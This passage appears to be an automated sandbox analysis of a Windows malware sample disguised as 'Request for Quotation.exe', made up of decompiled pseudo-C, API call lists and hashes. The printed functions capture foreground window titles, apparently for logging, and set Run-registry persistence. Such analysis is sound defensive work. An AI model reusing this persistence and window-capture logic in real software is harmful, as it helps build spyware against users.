                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFile
                                                                                • String ID:
                                                                                • API String ID: 2524636154-0
                                                                                • Opcode ID: a7fcdd5d29a1b382f6ef33917f0bc90febd8d745188de50769b0dd42fa64b31e
                                                                                • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                                                                • Opcode Fuzzy Hash: a7fcdd5d29a1b382f6ef33917f0bc90febd8d745188de50769b0dd42fa64b31e
                                                                                • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412F73, Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 30%
                                                                                			E00412F73(char _a4, void* _a20) {
				char _v5;
				void* _v24;
				char _v40;
				int _t26;
				int _t29;
				void* _t37;
				unsigned int _t66;
				signed int _t67;
				int _t70;
				signed short _t73;
				struct HWND__* _t81;
				void* _t83;

				_t81 = GetForegroundWindow();
				_t26 = GetWindowTextLengthA(_t81);
				_t89 = _t26;
				if(_t26 <= 0) {
					L6:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				}
				_t28 = _t26 + 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				E00413A29(_t29, _t29, _t29, __imp__tolower);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
				_t73 = 0;
				if(E00401838( &_v40) <= 0) {
					L5:
					E004017DD( &_v40);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L6;
				}
				_t82 = 0;
				while(1) {
					_t37 = E0040180C( &_v40, 0, _t82);
					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						break;
					}
					_t73 = _t73 + 1;
					_t82 = _t73 & 0x0000ffff;
					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
						continue;
					}
					goto L5;
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					asm("repne scasb");
					_t66 =  !( &_v24 | 0xffffffff);
					_t83 = _t37 - _t66;
					_t67 = _t66 >> 2;
					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
					__eflags = _t70;
					memcpy(_t83 + _t67 + _t67, _t83, _t70);
				}
				E004017DD( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 1;
			}















                                                                                0x00412f81
                                                                                0x00412f84
                                                                                0x00412f8a
                                                                                0x00412f8c
                                                                                0x00413063
                                                                                0x00413066
                                                                                0x00000000
                                                                                0x0041306c
                                                                                0x00412f95
                                                                                0x00412f9d
                                                                                0x00412fa6
                                                                                0x00412fb0
                                                                                0x00412fb8
                                                                                0x00412fc7
                                                                                0x00412fd1
                                                                                0x00412fdb
                                                                                0x00412fe2
                                                                                0x00412ff2
                                                                                0x00413001
                                                                                0x0041300b
                                                                                0x00413016
                                                                                0x0041301f
                                                                                0x00413052
                                                                                0x00413055
                                                                                0x0041305d
                                                                                0x00000000
                                                                                0x0041305d
                                                                                0x00413021
                                                                                0x00413023
                                                                                0x00413029
                                                                                0x00413032
                                                                                0x00413040
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413042
                                                                                0x00413046
                                                                                0x00413050
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00413050
                                                                                0x00413072
                                                                                0x00413076
                                                                                0x0041307b
                                                                                0x00413088
                                                                                0x0041308a
                                                                                0x00413090
                                                                                0x00413095
                                                                                0x0041309c
                                                                                0x0041309c
                                                                                0x0041309f
                                                                                0x0041309f
                                                                                0x004130a4
                                                                                0x004130ac
                                                                                0x004130b5
                                                                                0x00000000

                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                                                                • GetWindowTextA.USER32 ref: 00412FB8
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                                                                • String ID:
                                                                                • API String ID: 3496238640-0
                                                                                • Opcode ID: 1ef6a0afe55f8d1f9f56990fe4bd3b2f116220d55119b289a45dde596ddb661c
                                                                                • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                                                                • Opcode Fuzzy Hash: 1ef6a0afe55f8d1f9f56990fe4bd3b2f116220d55119b289a45dde596ddb661c
                                                                                • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004053DA, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                                                                  • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                                                                  • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                                                                  • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                                                                  • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                                                                  • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                                                                  • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                                                                  • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                                                                  • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                                                                  • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                                                                  • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                                                                  • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040543A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                                                                • Sleep.KERNEL32(00000064), ref: 004054D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3011177377-93608704
                                                                                • Opcode ID: 6c71c4cbee07232b7444e80abcc19cba8305c3e49664e3444ec54a4eeb34453a
                                                                                • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                                                                • Opcode Fuzzy Hash: 6c71c4cbee07232b7444e80abcc19cba8305c3e49664e3444ec54a4eeb34453a
                                                                                • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403744, Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                                                                • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                                                                • _itoa.MSVCRT ref: 0040377A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                                                                • String ID:
                                                                                • API String ID: 3966177967-0
                                                                                • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                                                                • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                                                                • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                                                                • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407D53, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                                                                0x00407d60
                                                                                0x00407d6a
                                                                                0x00407d71
                                                                                0x00407d7a
                                                                                0x00407d84
                                                                                0x00407d8c
                                                                                0x00407d99
                                                                                0x00407d9e
                                                                                0x00407da4
                                                                                0x00407da4
                                                                                0x00407dae
                                                                                0x00407db5
                                                                                0x00407dbe
                                                                                0x00407dc8
                                                                                0x00407dd0
                                                                                0x00407ddd
                                                                                0x00407de2
                                                                                0x00407de8
                                                                                0x00407de8
                                                                                0x00407df2
                                                                                0x00407e02
                                                                                0x00407e0c
                                                                                0x00407e21
                                                                                0x00407e2c
                                                                                0x00000000
                                                                                0x00407e2c
                                                                                0x00407e36

                                                                                APIs
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407DA4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                  • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B7D5
                                                                                  • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B7E3
                                                                                  • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                  • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B801
                                                                                  • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 0040B810
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407DBE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407DC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407DE8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407E02
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407E0C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407E2C
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                                                                • $ZA, xrefs: 00407DD0, 00407D8C
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 00407D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID: $ZA$C:\Users\user\Desktop\Request for Quotation.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                • API String ID: 111787555-3992257931
                                                                                • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                                                                • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                                                                • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
